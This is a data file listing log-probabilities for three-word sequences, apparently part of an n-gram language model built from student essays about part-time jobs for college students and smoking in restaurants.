-0.47770196 students come to
-0.47770196 who come to
-0.47770196 would come to
-0.79490125 n't manage to
-0.42986262 it means to
-0.47616065 the means to
-0.47616065 have means to
-1.308102 too much to
-0.496297 can go to
-0.496297 not go to
-0.4222064 to go to
-0.496297 students go to
-0.4201389 student needs to
-0.5442356 cases needs to
-0.5442356 Japan needs to
-0.7717023 not afford to
-0.6527414 really afford to
-0.51599467 or daughter to
-0.792582 or herself to
-1.0165179 of getting to
-0.7764021 about getting to
-0.58801734 is hard to
-0.58801734 studying hard to
-0.58801734 work hard to
-0.58801734 becomes hard to
-0.58211726 are back to
-0.58211726 giving back to
-0.66852593 necessary power to
-0.51599467 time dedicated to
-1.0922414 the government to
-0.66852593 In comparison to
-0.82269174 younger adults to
-0.32976374 They tend to
-0.32976374 adults tend to
-0.58211726 less likely to
-0.33417666 are likely to
-0.8406946 wealthy families to
-0.35784194 often want to
-0.35784194 students want to
-0.30015707 they want to
-0.35784194 who want to
-0.35784194 ft want to
-0.22774912 might want to
-0.52853036 should try to
-0.52853036 who try to
-0.51599467 previously unavailable to
-1.0014844 it takes to
-0.7711173 much harder to
-0.8394692 the freedom to
-0.7032818 , freedom to
-0.7711173 only serve to
-0.51599467 be encouraged to
-0.73416126 was fortunate to
-0.7764603 have wisely to
-1.2503176 a week to
-0.66852593 and ready to
-0.51599467 is bound to
-0.51599467 be tempting to
-0.51599467 be urged to
-0.51599467 dependent child to
-0.876392 back home to
-0.76853204 social responsibility to
-0.76853204 certainly responsibility to
-0.66852593 all seem to
-0.85648745 from person to
-0.89154303 that adding to
-1.0291091 for companies to
-0.66852593 too easy to
-0.66852593 coined wisdom to
-0.51599467 a network to
-0.51599467 up needing to
-0.66852593 and references to
-1.1704624 an individual to
-0.66852593 eventually wants to
-0.51599467 and attentive to
-0.7764603 other resources to
-0.7711173 ggreen h to
-0.7711173 is needed to
-0.51599467 they plan to
-0.7711173 contributing further to
-0.51599467 mental stability to
-1.0143895 for her to
-0.3085336 it allowed to
-0.26086792 be allowed to
-0.3085336 are allowed to
-0.64097995 a right to
-0.89631003 the right to
-0.64097995 their right to
-0.51599467 feel obliged to
-0.51599467 duties assigned to
-0.7764603 with respect to
-0.51599467 policy measures to
-0.792582 the decision to
-0.51599467 real consequences to
-0.51599467 much closer to
-0.51599467 disadvantage compared to
-0.51599467 award credits to
-1.1692687 their children to
-0.5800439 to choose to
-0.47616065 they choose to
-0.47616065 who choose to
-0.47059247 and had to
-0.47059247 college had to
-0.47059247 they had to
-0.47059247 myself had to
-0.47059247 someone had to
-0.58487517 is required to
-0.58487517 effort required to
-0.51599467 very surprised to
-0.51599467 first came to
-0.66852593 they bring to
-0.7711173 devoted purely to
-0.7711173 is given to
-0.51599467 that relates to
-0.51599467 not suited to
-0.7994119 should look to
-0.79490125 wise choice to
-0.51599467 research assistant to
-0.51599467 scenario leads to
-0.66852593 is merit to
-0.51599467 the capital to
-0.6975849 allow me to
-0.6975849 enabled me to
-0.51599467 various task to
-0.51599467 <s> Looking to
-0.3676195 who goes to
-0.51599467 time adjusting to
-0.79490125 restaurant employees to
-0.51599467 thereby adjust to
-0.66852593 their utmost to
-0.51599467 to prove to
-0.73416126 money left to
-0.73416126 is finished to
-0.66852593 upon ourselves to
-0.73416126 their kids to
-0.4555147 I wish to
-0.1543163 they wish to
-0.3085336 who wish to
-0.51599467 the key to
-0.51599467 , leading to
-0.51599467 people accustomed to
-0.51599467 welcome shock to
-0.51599467 habits deleterious to
-0.51599467 obsessive devotion to
-0.51599467 own disciplines to
-0.51599467 from dependence to
-0.45172024 and begins to
-0.27580485 he begins to
-0.51599467 with whom to
-0.66852593 or women to
-0.66852593 not applied to
-0.66852593 it comes to
-0.66852593 have nothing to
-0.51599467 , traveling to
-0.1485141 -LRB- due to
-0.1485141 college due to
-0.1485141 relief due to
-0.1485141 unread due to
-0.51599467 been shown to
-0.51599467 has similarities to
-0.51599467 less apt to
-0.51599467 is supplementary to
-0.51599467 and hopes to
-0.32976374 virtually impossible to
-0.32976374 near impossible to
-0.51599467 This applies to
-0.51599467 are introduced to
-0.66852593 be offered to
-0.2119523 being exposed to
-0.2119523 are exposed to
-0.2119523 when exposed to
-0.73416126 the 40 to
-0.51599467 are thrown to
-0.66852593 are distracting to
-0.51599467 student decides to
-0.51599467 is conducive to
-0.74071324 boils down to
-0.51599467 more attracted to
-0.51599467 and continues to
-0.51599467 have access to
-1.4212176 in restaurants to
-0.8822992 a man to
-0.66852593 undivided attention to
-0.51599467 being asked to
-0.51599467 not pertain to
-0.51599467 is admitted to
-0.51599467 time commuting to
-0.32976374 as opposed to
-0.32976374 am opposed to
-0.51599467 be safe-guarded to
-0.51599467 a hurry to
-0.51599467 robbing Peter to
-0.7711173 opposite approach to
-0.66852593 money aside to
-0.51599467 certainly advisable to
-0.7711173 their rights to
-0.51599467 legally compelled to
-0.51599467 some harm to
-0.66852593 moral justification to
-0.51599467 the campaigns to
-0.51599467 more prone to
-0.32976374 unwanted exposure to
-0.32976374 Regular exposure to
-0.30578586 anywhere close to
-0.51599467 react violently to
-0.51599467 an insult to
-0.21239409 be forced to
-0.32976374 are forced to
-0.871818 in with their
-1.0052555 students with their
-0.93343186 help with their
-0.3878774 interfere with their
-0.7266834 activities with their
-0.7266834 living with their
-0.7266834 responsible with their
-0.7266834 organized with their
-0.7266834 along with their
-0.7266834 spent with their
-0.7266834 interact with their
-0.8343153 study for their
-1.12276 only for their
-1.12276 idea for their
-1.318425 them for their
-0.8343153 used for their
-0.8343153 best for their
-0.8343153 material for their
-0.8343153 concern for their
-1.0308405 things for their
-0.8343153 rewarding for their
-0.8343153 room for their
-1.24111 it that their
-1.7124686 time is their
-1.226466 careers is their
-0.9537364 condition , their
-0.9537364 Otherwise , their
-0.9537364 regardless , their
-0.7253599 of by their
-0.7253599 created by their
-0.7253599 or by their
-0.7253599 determined by their
-0.7253599 quit by their
-0.7253599 funded by their
-1.1893269 job in their
-1.0488584 and in their
-1.1033635 experience in their
-1.1825448 working in their
-1.010111 jobs in their
-0.9870401 them in their
-0.7375863 done in their
-0.8871243 period in their
-0.7375863 stake in their
-0.7375863 importance in their
-0.39148036 learn in their
-0.7375863 change in their
-0.7375863 quickly in their
-0.7375863 day in their
-0.8871243 person in their
-0.8871243 early in their
-0.9511195 interest in their
-0.7375863 confidence in their
-1.0333644 later in their
-0.7375863 distraction in their
-0.7375863 stage in their
-0.7375863 excel in their
-0.7375863 behind in their
-0.7375863 marks in their
-0.7375863 advances in their
-1.5383627 job and their
-1.3075469 student and their
-1.3939261 school and their
-1.3075469 well and their
-1.1737754 grades and their
-0.9196386 taxpayers and their
-0.7900746 <s> of their
-1.0851387 that of their
-1.0405678 quality of their
-1.0916538 most of their
-1.0851387 knowledge of their
-0.7900746 use of their
-0.7220074 all of their
-0.7900746 period of their
-0.7900746 independent of their
-1.0405678 aspects of their
-0.42373347 cost of their
-0.82002604 out of their
-0.7900746 reduction of their
-0.7900746 particulars of their
-1.0405678 those of their
-1.1142563 years of their
-1.1348124 outside of their
-0.28777322 rest of their
-0.7900746 expectations of their
-0.7900746 negligence of their
-0.7900746 dime of their
-0.7900746 undecided of their
-0.40799108 direction of their
-0.7900746 detriment of their
-0.7900746 remainder of their
-0.7900746 behalf of their
-1.2071253 it to their
-1.2742101 experience to their
-0.50997126 related to their
-1.2742101 or to their
-1.0977969 more to their
-0.8756907 external to their
-0.8756907 relevant to their
-1.0977969 prior to their
-1.0977969 regards to their
-1.1398947 going to their
-0.8756907 transition to their
-0.8756907 question to their
-0.7110288 addition to their
-1.0977969 back to their
-0.8756907 dedicated to their
-0.8756907 home to their
-0.8756907 relates to their
-1.2742101 due to their
-0.8756907 harm to their
-0.9344526 those studying their
-0.88554215 people from their
-1.0650632 away from their
-0.88554215 learning from their
-0.7364645 exclusively from their
-0.7364645 home from their
-0.7364645 independence from their
-0.7364645 break from their
-0.7364645 distract from their
-0.9519054 studies as their
-1.6034954 young students their
-0.34274846 focus on their
-0.6310951 effectively on their
-0.6310951 more on their
-0.6310951 spend on their
-0.6310951 activities on their
-0.3536326 relying on their
-0.7434528 concentrate on their
-0.6310951 participation on their
-0.7434528 effect on their
-0.6310951 dependent on their
-0.6310951 strictly on their
-0.78844887 rely on their
-0.2600605 concentrating on their
-0.6310951 priority on their
-0.6310951 purely on their
-0.3536326 pressure on their
-0.6310951 difficulties on their
-1.5796918 but also their
-0.95285255 America work their
-1.5468633 Even if their
-0.8452257 have pursuing their
-0.9093543 n't pay their
-2.1311002 to have their
-1.6433324 students have their
-0.914435 always have their
-0.53273916 and select their
-0.9180421 society through their
-0.9285632 input into their
-1.3843775 to spend their
-1.0724907 students spend their
-0.91536397 to put their
-0.8996403 students when their
-1.1385047 better when their
-0.9413828 should do their
-0.42911297 to use their
-0.89070636 They know their
-0.936485 destroying what their
-0.93577343 all after their
-0.8273003 should encourage their
-1.2022369 for all their
-0.8192704 focus all their
-1.0074146 spend all their
-0.8192704 use all their
-1.8714768 <s> If their
-1.4199535 they get their
-1.1215585 them get their
-0.9198701 hand how their
-0.87201214 before entering their
-0.53273916 , neglecting their
-1.675651 to make their
-0.38769767 is managing their
-0.24358147 , managing their
-0.4482546 in managing their
-0.73820513 working during their
-0.6270381 time during their
-0.6270381 worked during their
-0.6270381 hard during their
-0.8710371 be earning their
-1.444735 to enjoy their
-0.8017274 , balancing their
-1.0198613 will improve their
-0.92660564 test out their
-0.9187945 learning about their
-0.8584982 from either their
-1.1703831 to support their
-0.81577957 fully support their
-0.7621919 must keep their
-0.9222623 ; building their
-0.53273916 to divide their
-0.6751038 not let their
-0.6751038 to let their
-0.8584982 should quit their
-0.69251406 than sacrifice their
-0.8933335 money before their
-0.86987996 graduates enter their
-0.69251406 may hinder their
-0.8584982 diligent until their
-0.53273916 afford maintaining their
-0.907919 though getting their
-0.6751038 will change their
-0.6751038 quickly change their
-0.53273916 whilst furthering their
-0.86987996 balance between their
-0.53273916 to dip their
-0.8621682 will appreciate their
-0.6751038 completely waste their
-0.6751038 than waste their
-1.0547684 to reduce their
-0.7621919 and reach their
-0.7621919 making sure their
-1.0615355 to build their
-0.69251406 of securing their
-0.9222623 to ask their
-0.7621919 experience planning their
-0.69251406 consequently damage their
-0.53273916 and augment their
-0.69251406 -RRB- finish their
-0.8584982 eventually lose their
-1.2939311 to balance their
-0.84814715 can assist their
-0.8355508 , complete their
-0.70041466 to complete their
-0.70041466 students develop their
-0.70041466 also develop their
-0.8017274 and pass their
-0.8017274 count towards their
-0.7621919 and receive their
-0.53273916 to raise their
-0.8017274 are given their
-0.8017274 as using their
-0.82897985 are within their
-0.53273916 even mortgaging their
-0.53273916 local shops their
-0.7621919 upon leaving their
-0.53273916 by assessing their
-0.53273916 to spread their
-0.8017274 , finally their
-0.53273916 <s> Throughout their
-0.53273916 help relieve their
-0.53273916 of funding their
-0.69251406 and beginning their
-0.53273916 to sharpen their
-0.53273916 essentially shape their
-0.9222623 is nonetheless their
-0.53273916 to compromise their
-0.53273916 choices regarding their
-2.8066833 of the chosen
-1.4422953 in their chosen
-1.9751806 of their chosen
-0.931002 about their chosen
-0.931002 beginning their chosen
-2.1864977 they have chosen
-2.4501126 of the course
-2.3479283 to the course
-1.5325897 during the course
-0.44819883 , of course
-0.94075143 And of course
-0.94075143 so of course
-1.3610553 type of course
-0.94075143 always of course
-1.3230749 their chosen course
-0.86294854 about whether course
-0.3781252 <s> Of course
-0.54122734 the core course
-0.7048308 when setting course
-0.84159017 a heavy course
-0.96567583 materials for study
-0.96684366 balancing a study
-0.8986884 and full-time study
-1.6525701 classes , study
-2.0523765 do not study
-1.877816 work and study
-0.9612025 quietly and study
-0.21680178 field of study
-1.1792585 course of study
-0.6122932 area of study
-0.9226842 subject of study
-0.9226842 year of study
-1.4659714 years of study
-0.9226842 hours of study
-1.2964091 be to study
-1.571146 is to study
-0.9150448 chosen to study
-2.0041645 students to study
-0.9150448 less to study
-1.2613357 time to study
-1.1655626 themselves to study
-1.1655626 use to study
-1.6930503 going to study
-0.9150448 areas to study
-0.9150448 encouraged to study
-0.9150448 purely to study
-1.3643526 , their study
-2.0715368 of their study
-1.9694728 to their study
-1.6395843 of students study
-0.922965 to less study
-0.9007268 the available study
-1.223827 they only study
-0.9417805 classes or study
-0.9417805 expenses or study
-0.9255283 with academic study
-1.7478527 a good study
-1.4363996 and doing study
-1.2405678 make them study
-1.2047782 people must study
-0.7743107 Anything beyond study
-0.953135 reduces my study
-0.9271722 the hard study
-0.9179611 6 day study
-1.3702492 <s> All study
-0.7022626 and effective study
-0.83807516 , reduces study
-0.5394636 of uninteresting study
-0.7022626 in depth study
-0.5784601 , for example
-0.6068073 <s> For example
-0.96263754 Along with studying
-0.99385834 time for studying
-1.825511 which is studying
-1.248698 she is studying
-2.3491814 a student studying
-1.64252 working , studying
-1.4319112 year , studying
-0.955451 respond by studying
-0.9673256 effectiveness in studying
-1.4206492 college and studying
-1.2539113 diligent and studying
-0.96294063 stress of studying
-1.53831 costs of studying
-1.0870826 focus on studying
-1.2210097 concentration on studying
-1.6895361 their time studying
-1.3270628 extra time studying
-1.5001065 more time studying
-1.9820553 students are studying
-2.131232 they are studying
-0.94139206 either spend studying
-0.6212433 job while studying
-0.70595443 working while studying
-1.2107427 is because studying
-0.76711124 they were studying
-0.76711124 % were studying
-0.8847982 to someone studying
-0.927614 example those studying
-0.92951506 several years studying
-0.89365876 not spent studying
-0.7747171 have finished studying
-0.96997774 medicine and engineering
-0.94992566 student studying engineering
-1.2483399 to an engineering
-0.5415809 advanced mechanical engineering
-0.9627519 living it has
-0.942605 student that has
-0.942605 study that has
-1.6089711 students that has
-0.9625333 Part-time job has
-2.339474 a student has
-2.2043755 job , has
-1.3931006 time , has
-0.9662096 poison and has
-0.8148012 studying engineering has
-1.194812 second reason has
-0.903101 money one has
-0.903101 things one has
-1.9919212 part-time work has
-0.93960273 job market has
-0.9028778 person who has
-0.9028778 Anyone who has
-0.94668555 life which has
-1.8513876 college education has
-1.2167567 adult world has
-0.88401926 , someone has
-0.9145946 and workplace has
-0.90997994 every individual has
-1.1575813 that he has
-0.8386006 a teacher has
-0.8386006 eEm Poker has
-0.7741124 online poker has
-0.5397277 new trend has
-1.3515453 second-hand smoke has
-0.5397277 the air has
-1.8425382 will be very
-1.7742618 not be very
-1.5964961 could be very
-1.7303654 is a very
-1.2559645 provides a very
-1.5247533 it is very
-1.6911908 job is very
-1.3133973 It is very
-0.9264556 graduates is very
-0.9264556 resume is very
-2.5518703 of the very
-0.9648307 meet the very
-2.0866027 are not very
-1.4396361 exposed to very
-0.94634616 engineering has very
-0.9641581 Parents work very
-1.5279132 Students should very
-1.7763419 at college very
-0.9398573 perhaps become very
-0.70341635 generally pays very
-1.1673017 , are very
-1.7168996 students are very
-1.5755847 who are very
-0.91602075 force are very
-1.5065291 It fs very
-0.9062093 is still very
-0.9006796 have worked very
-1.6167034 I was very
-0.8157978 by its very
-0.5402563 be weighed very
-1.5400867 , with little
-0.9200527 jobs with little
-1.3085594 out with little
-1.470797 and having little
-1.3388386 for a little
-1.5929991 work a little
-2.2172606 have a little
-0.7365464 earn a little
-0.9351971 know a little
-1.2021183 earning a little
-1.2678394 be of little
-0.8854596 has very little
-0.8854596 pays very little
-0.9647908 have as little
-1.8680534 students have little
-1.5701579 may have little
-0.95290124 sacrifice what little
-1.7776026 , that experience
-0.95494294 get that experience
-0.9604914 world job experience
-0.89612734 a valuable experience
-0.6730385 little valuable experience
-0.6730385 gain valuable experience
-0.6730385 provide valuable experience
-1.6719376 , the experience
-1.8057064 have the experience
-1.2323068 get the experience
-1.2323068 needs the experience
-2.0363104 they will experience
-0.997246 to acquire experience
-1.525286 skills and experience
-0.95944 maturity and experience
-0.9656664 backdrop of experience
-2.0183604 have to experience
-2.135761 able to experience
-1.8001362 chance to experience
-1.7098913 opportunity to experience
-1.7964344 well as experience
-0.9646738 what students experience
-1.5164812 <s> Such experience
-0.4528451 hands on experience
-0.95147413 ; also experience
-0.81432205 is work experience
-1.084723 and work experience
-1.2199986 of work experience
-0.81432205 gain work experience
-0.9998067 Part-time work experience
-0.81432205 prior work experience
-0.81432205 gaining work experience
-0.81432205 Actual work experience
-1.9036644 is an experience
-1.5002863 they may experience
-1.2204484 The college experience
-0.94501483 his college experience
-1.6187613 who have experience
-1.3791095 with some experience
-0.933936 you first experience
-1.6515415 <s> This experience
-1.2376906 gives them experience
-0.7307635 people useful experience
-0.7307635 provide useful experience
-0.7721529 provide relevant experience
-0.866115 valuable life experience
-0.866115 great life experience
-0.866115 positive life experience
-0.7009841 only providing experience
-0.54900295 of actual experience
-0.54900295 The actual experience
-1.2062893 the learning experience
-0.95127696 about my experience
-0.53858435 Such hands-on experience
-1.1095665 first hand experience
-0.7009841 no direct experience
-0.53858435 a worthwhile experience
-0.838894 provide invaluable experience
-0.53858435 provide real-world experience
-0.53858435 <s> Work experience
-0.53858435 burger flipping experience
-1.7983265 job can gain
-1.5515639 students can gain
-2.4883869 , and gain
-1.3162407 money and gain
-1.4989645 experience to gain
-1.2339593 helps to gain
-1.6159928 able to gain
-0.95212805 stand to gain
-0.95212805 man to gain
-2.1019545 the students gain
-1.8168498 can also gain
-0.9374136 actual financial gain
-2.2606785 a student from
-0.45258546 to and from
-1.1599411 to gain from
-0.7873364 financial gain from
-0.9540956 hand working from
-0.9623042 Otherwise students from
-1.6169142 , time from
-1.2194326 transitional time from
-0.93695086 books but from
-1.7594473 not only from
-1.9234828 of money from
-0.92789894 getting money from
-0.9354825 will benefit from
-0.7279561 professional benefit from
-0.5365689 <s> Apart from
-0.7687077 experience gained from
-1.1507621 my friends from
-1.1721927 for people from
-1.677944 young people from
-0.33989608 have borrowed from
-0.33989608 you borrowed from
-0.9506547 distracts them from
-0.88658917 that useful from
-1.003229 <s> Learning from
-1.1324358 students get from
-0.8961284 n't get from
-0.15241522 student away from
-0.10523577 time away from
-0.15241522 take away from
-0.15241522 them away from
-0.15241522 moved away from
-0.15241522 possess away from
-1.3735092 a lot from
-1.101239 we graduate from
-0.5365689 be acquired from
-0.44602832 for transition from
-0.5160283 the transition from
-0.44602832 to transition from
-0.8629007 are learning from
-0.8629007 Whether learning from
-0.3593727 very different from
-0.3593727 are different from
-0.91974634 or support from
-0.8539863 study free from
-0.92115134 and those from
-0.86957264 may come from
-0.5365689 knowledge exclusively from
-0.5365689 more scholarships from
-0.83233684 to adapt from
-0.5365689 their leap from
-0.88535434 graduate fully from
-0.33989608 to escape from
-0.33989608 an escape from
-0.5365689 <s> Wages from
-0.92855704 valuable things from
-0.6980578 , suffering from
-0.33989608 to refrain from
-0.33989608 should refrain from
-1.2770003 at home from
-0.5365689 , ranging from
-0.8859713 of independence from
-0.6980578 of view from
-0.5365689 to hide from
-0.6980578 a break from
-0.6980578 result direct from
-0.86880887 they save from
-0.6980578 to cities from
-0.6980578 still profit from
-1.0699387 be banned from
-0.67921686 were banned from
-1.003229 after graduating from
-0.5365689 <s> Incomes from
-0.5365689 to comprehend from
-0.5365689 will vary from
-0.5365689 in contact from
-0.5365689 somewhat lacking from
-0.5365689 have evolved from
-0.6980578 only distract from
-0.5365689 are fatigued from
-0.5365689 will occur from
-0.95894504 problem with working
-1.715639 time for working
-0.9548179 get for working
-1.1281204 <s> While working
-1.7239038 is that working
-1.3592727 believe that working
-1.5926366 think that working
-0.9250762 life-lesson that working
-2.4316392 of the working
-2.3323026 to the working
-1.8818469 job , working
-1.7395475 example , working
-1.3659658 conclusion , working
-1.8031971 Secondly , working
-1.4455705 second , working
-0.9362907 store , working
-1.2041423 end , working
-0.9362907 old , working
-1.2459824 of not working
-0.8660464 that by working
-1.0818306 college by working
-0.8660464 believe by working
-2.0845842 , and working
-1.8708798 money and working
-1.2181348 classes and working
-0.94378626 childhood and working
-1.5890657 experience of working
-0.9523797 expect of working
-1.4998515 instead of working
-1.6704613 of their working
-1.3018676 Of course working
-1.3938547 to experience working
-0.9196146 them experience working
-0.97466594 gain from working
-0.79775614 gained from working
-0.79775614 useful from working
-0.97466594 get from working
-0.79775614 lot from working
-0.97466594 refrain from working
-1.7896668 well as working
-1.5857228 of students working
-1.9165133 college students working
-1.5564785 their time working
-0.90139276 some time working
-1.5097613 spend time working
-1.3416611 free time working
-0.94328165 are only working
-1.6555629 <s> And working
-0.8700354 benefits does working
-0.959562 student are working
-1.4787228 <s> Part-time working
-0.7670313 <s> By working
-0.70755357 f By working
-1.5967587 social skills working
-0.9169576 jobs like working
-0.86289465 time while working
-0.86289465 spending while working
-1.9975958 I believe working
-0.9484584 break fs working
-1.2083856 end up working
-0.69996405 to continue working
-0.8694601 always either working
-1.2546649 to start working
-1.6246588 rather than working
-0.92470735 , hard working
-1.1486547 was always working
-1.6504033 <s> Students working
-1.2508029 per week working
-0.8799523 juggle both working
-1.3182389 other hand working
-0.53788227 human unhappiness working
-0.53788227 , excessive working
-0.9952305 without ever working
-0.7709515 are currently working
-0.53788227 the tedious working
-0.53788227 against anybody working
-0.8349358 a smoke-free working
-0.95454973 worked part-time as
-1.9946979 a job as
-2.2877362 part-time job as
-1.5281644 smoke is as
-2.2105148 the student as
-1.1662025 not , as
-0.91540414 increased , as
-1.4410514 school , as
-1.5653061 -RRB- , as
-1.6398562 money , as
-0.6093644 future , as
-0.91540414 regard , as
-1.1662025 success , as
-1.1662025 now , as
-0.91540414 choice , as
-1.6073389 Finally , as
-0.91540414 smokers , as
-0.92488533 as often as
-1.4127368 part-time employment as
-0.95631826 sophisticated and as
-0.8327236 true nature as
-1.8548603 to study as
-0.91484255 will experience as
-0.91484255 my experience as
-1.647098 from working as
-2.5522134 college students as
-1.4873977 <s> Such as
-2.0252297 their studies as
-0.9195953 many jobs as
-0.9195953 get jobs as
-0.9091333 much focus as
-0.92808414 wanted -LRB- as
-0.19727507 , such as
-0.42116535 jobs such as
-0.42116535 -LRB- such as
-0.42116535 oriented such as
-0.42116535 ; such as
-0.42116535 more such as
-0.2607204 skills such as
-0.42116535 age such as
-0.42116535 virtues such as
-0.42116535 activity such as
-0.42116535 establishments such as
-1.8646834 should have as
-1.1844832 with money as
-0.9255703 is money as
-1.6184187 <s> And as
-0.9332814 see you as
-0.93157405 lab or as
-0.93157405 hotels or as
-0.33464238 as well as
-0.8741558 immediate benefits as
-1.3760614 Such skills as
-0.94693446 as important as
-0.9203032 situate themselves as
-0.9088372 working environment as
-1.2073896 a position as
-0.88309705 and financially as
-1.6641262 to spend as
-0.8327236 several times as
-1.1460747 my friends as
-0.8732575 and put as
-1.8474128 young people as
-0.94770306 treating them as
-0.46533644 little distractions as
-0.46533644 enough distractions as
-1.4312402 of society as
-1.1836098 same activities as
-0.919852 view university as
-1.1102194 their finances as
-0.8056084 many pressures as
-0.53482395 pressures generated as
-1.1690992 of living as
-0.76573384 are almost as
-0.69552916 not require as
-1.4387888 work force as
-0.8896389 finding success as
-0.8314178 many interests as
-1.821082 to learn as
-0.86577785 but beneficial as
-0.8822819 responsibilities just as
-0.86678696 can come as
-0.73361915 as much as
-0.8314178 healthcare system as
-0.53482395 more manageable as
-1.3658822 <s> Working as
-1.0549879 so far as
-0.9253121 Such things as
-0.8056084 also serve as
-0.90404695 my days as
-0.40050438 as soon as
-0.76573384 entirely -- as
-0.53482395 It serves as
-0.69552916 communicate socially as
-0.8327236 work together as
-0.76573384 as expensive as
-0.76573384 paid off as
-0.99813837 after graduating as
-0.69552916 be seen as
-0.8056084 and finally as
-0.53482395 are mocked as
-0.69552916 your hobbies as
-1.637024 the health as
-0.53482395 makes decisions as
-0.53482395 as open as
-0.69552916 or nightclubs as
-0.53482395 anyone else as
-0.8327236 for smokers as
-1.4503464 as a waiter
-1.6868842 that a restaurant
-0.98436725 in a restaurant
-1.9420761 to a restaurant
-2.3403213 for the restaurant
-1.418139 if the restaurant
-0.9615649 go the restaurant
-0.99710274 health of restaurant
-1.2587683 restrictions on restaurant
-1.3330526 for those restaurant
-0.5413157 local fast-food restaurant
-0.5413157 <s> Exposing restaurant
-1.1374357 <s> While there
-2.1990576 believe that there
-1.5823354 student , there
-1.3328489 Moreover , there
-0.92981833 Besides , there
-0.92981833 good , there
-1.1333123 However , there
-1.3328489 all , there
-0.92981833 itself , there
-0.92981833 things , there
-0.44561693 Currently , there
-0.92981833 importantly , there
-1.5377619 studying and there
-0.9627949 costly and there
-2.012047 , as there
-0.9487086 doing work there
-0.9487086 potentially work there
-0.94082564 And then there
-1.598442 , but there
-1.1111779 work but there
-1.5860317 <s> However there
-0.9533297 -LRB- when there
-2.0266309 <s> If there
-1.5860317 <s> Firstly there
-1.3448688 I feel there
-0.9374259 restaurants than there
-0.84223896 -LRB- though there
-1.1374357 <s> Perhaps there
-1.8475375 I think there
-0.5402563 and driving there
-0.5402563 is served there
-1.219691 is having ample
-2.026697 there is ample
-1.5127633 for this reason
-0.31696922 For this reason
-2.488804 , the reason
-0.70405877 is ample reason
-0.6228536 the only reason
-0.8113749 <s> Another reason
-1.51157 most important reason
-0.3732322 The first reason
-0.861478 My first reason
-0.94084615 another good reason
-0.932323 The other reason
-0.7994546 The main reason
-0.8356117 and no reason
-1.0328804 has no reason
-0.43217087 My second reason
-1.0154324 a significant reason
-0.9420421 most obvious reason
-1.149096 is for students
-1.2462037 reason for students
-0.847671 does for students
-1.0959679 important for students
-1.149096 idea for students
-0.847671 chance for students
-0.847671 difficult for students
-0.847671 way for students
-0.847671 hold for students
-1.052028 possibilities for students
-0.8288067 reason that students
-1.2256379 jobs that students
-1.2330058 skills that students
-1.4566 believe that students
-0.8288067 consequence that students
-0.8288067 out that students
-0.8288067 hope that students
-1.2029401 things that students
-1.1121206 fact that students
-1.0222106 belief that students
-0.8288067 seen that students
-2.1679451 in a students
-2.1165128 of a students
-1.8212053 for the students
-1.5073687 , the students
-1.346804 and the students
-1.3831724 of the students
-1.7842155 to the students
-1.2909663 if the students
-1.1615291 when the students
-0.9127746 allow the students
-0.9127746 workplace the students
-0.9127746 everything the students
-1.550979 job , students
-1.4962642 example , students
-1.3264197 working , students
-1.1015888 reason , students
-1.3864871 studies , students
-1.5089428 time , students
-1.3264197 school , students
-1.4548239 college , students
-0.87796056 therefore , students
-1.2120088 university , students
-1.481932 Firstly , students
-1.1015888 independent , students
-1.5166782 Secondly , students
-1.3264197 Thirdly , students
-1.3845115 education , students
-1.2799147 addition , students
-0.87796056 offers , students
-1.2120088 Thus , students
-1.466784 Finally , students
-0.87796056 Recently , students
-1.1015888 Indeed , students
-0.6559664 for many students
-1.1301147 , many students
-0.55779207 For many students
-1.1673657 are many students
-0.9514232 flexible and students
-1.6383531 education and students
-1.2103609 cases of students
-1.7271628 idea of students
-0.7389666 majority of students
-0.93963575 success of students
-1.5858973 available to students
-0.6244689 jobs to students
-0.9537648 credits to students
-1.4922571 different from students
-0.9509391 Part-time working students
-0.9546628 just as students
-1.1780078 only reason students
-0.9551904 influences on students
-1.7426541 <s> The students
-1.8484119 the time students
-0.90968853 high school students
-1.6214026 , if students
-1.4094825 Even if students
-0.9395773 for such students
-0.9351596 3 -RRB- students
-0.044907983 for college students
-0.14352463 that college students
-0.48693514 is college students
-0.66272634 the college students
-0.3840299 , college students
-0.29252407 many college students
-0.48693514 and college students
-0.47550857 of college students
-0.6633499 to college students
-0.48693514 For college students
-0.56450295 if college students
-0.48693514 some college students
-0.48693514 most college students
-0.48693514 more college students
-0.29252407 Many college students
-0.29252407 all college students
-0.21925443 Japanese college students
-0.29252407 If college students
-0.48693514 believe college students
-0.48693514 support college students
-0.48693514 poor college students
-0.48693514 non college students
-0.48693514 enables college students
-0.48693514 think college students
-0.48693514 easy college students
-0.48693514 All college students
-0.48693514 whereby college students
-0.48693514 among college students
-0.48693514 including college students
-0.48693514 Advising college students
-0.7116127 , some students
-0.85090923 For some students
-0.51520616 are some students
-0.7116127 think some students
-0.7116127 why some students
-0.855072 for most students
-0.38129213 , most students
-0.855072 of most students
-0.7146293 which most students
-0.8122291 <s> Most students
-1.2220302 will benefit students
-1.0067129 money ; students
-0.8188153 world ; students
-0.94233793 campus more students
-0.7035715 it helps students
-0.7035715 also helps students
-0.95131576 solely at students
-0.8300856 <s> Many students
-0.77138203 , Many students
-0.5273503 it gives students
-0.5273503 job gives students
-0.5273503 also gives students
-0.39835224 <s> College students
-0.7251668 many College students
-0.94892025 can help students
-0.93922883 will help students
-1.0321584 to help students
-0.37554207 also help students
-0.37554207 jobs help students
-1.5484686 , when students
-0.93998677 from what students
-1.0254842 to encourage students
-1.2086327 for all students
-0.82190704 encourage all students
-0.82190704 Should all students
-0.82190704 behooves all students
-0.774179 that Japanese students
-0.774179 if Japanese students
-1.2007107 and therefore students
-1.1508892 can provide students
-1.157534 jobs provide students
-1.9045634 <s> If students
-0.87268853 helps teach students
-0.39350784 jobs give students
-0.7438034 they give students
-0.31611434 with fellow students
-0.31611434 their fellow students
-0.31611434 my fellow students
-1.9606249 I believe students
-0.53456277 Many recently-graduated students
-0.6145564 for university students
-0.6145564 many university students
-0.6145564 or university students
-0.6145564 hire university students
-1.7193122 <s> A students
-1.2067581 skills which students
-1.3478189 , these students
-0.76528955 by allowing students
-0.53456277 , encourages students
-0.8501539 also provides students
-0.9578978 , where students
-0.74171937 internships where students
-0.74171937 departments where students
-0.33891883 often expose students
-0.33891883 to expose students
-0.80512136 it requires students
-0.77669966 I feel students
-0.5510716 it allows students
-0.45155254 job allows students
-0.39056498 This allows students
-0.39056498 wage allows students
-1.4111228 <s> So students
-1.5872836 rather than students
-0.8923882 <s> Some students
-0.8841342 If possible students
-1.1717662 four years students
-0.84897876 then poor students
-0.8309009 would allow students
-0.50768566 that young students
-0.9374318 a young students
-0.8312716 many young students
-0.69727564 gives young students
-0.76528955 job enables students
-1.0315319 it teaches students
